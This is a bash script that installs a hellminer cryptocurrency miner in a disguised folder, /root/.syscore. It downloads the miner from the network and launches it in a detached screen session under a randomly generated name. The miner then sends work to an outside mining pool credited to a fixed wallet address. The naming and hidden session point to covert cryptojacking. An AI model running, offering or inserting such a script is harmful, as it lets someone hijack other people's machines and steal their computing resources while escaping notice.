#!/bin/bash

apt update -y && apt install -y screen wget tar

mkdir -p /root/.syscore && cd /root/.syscore

wget -q https://github.com/hellcatz/hminer/releases/download/v0.59.1/hellminer_linux64.tar.gz
tar -xf hellminer_linux64.tar.gz && chmod +x hellminer

sname=$(head /dev/urandom | tr -dc a-z0-9 | head -c6)
wid=$(head /dev/urandom | tr -dc a-z0-9 | head -c4)

screen -dmS $sname ./hellminer -c stratum+tcp://kz.vipor.net:5040 -u RQdUotwPueFvRY5xKfn6REsMUsBdhhmqdq.$wid -p x --threads 7
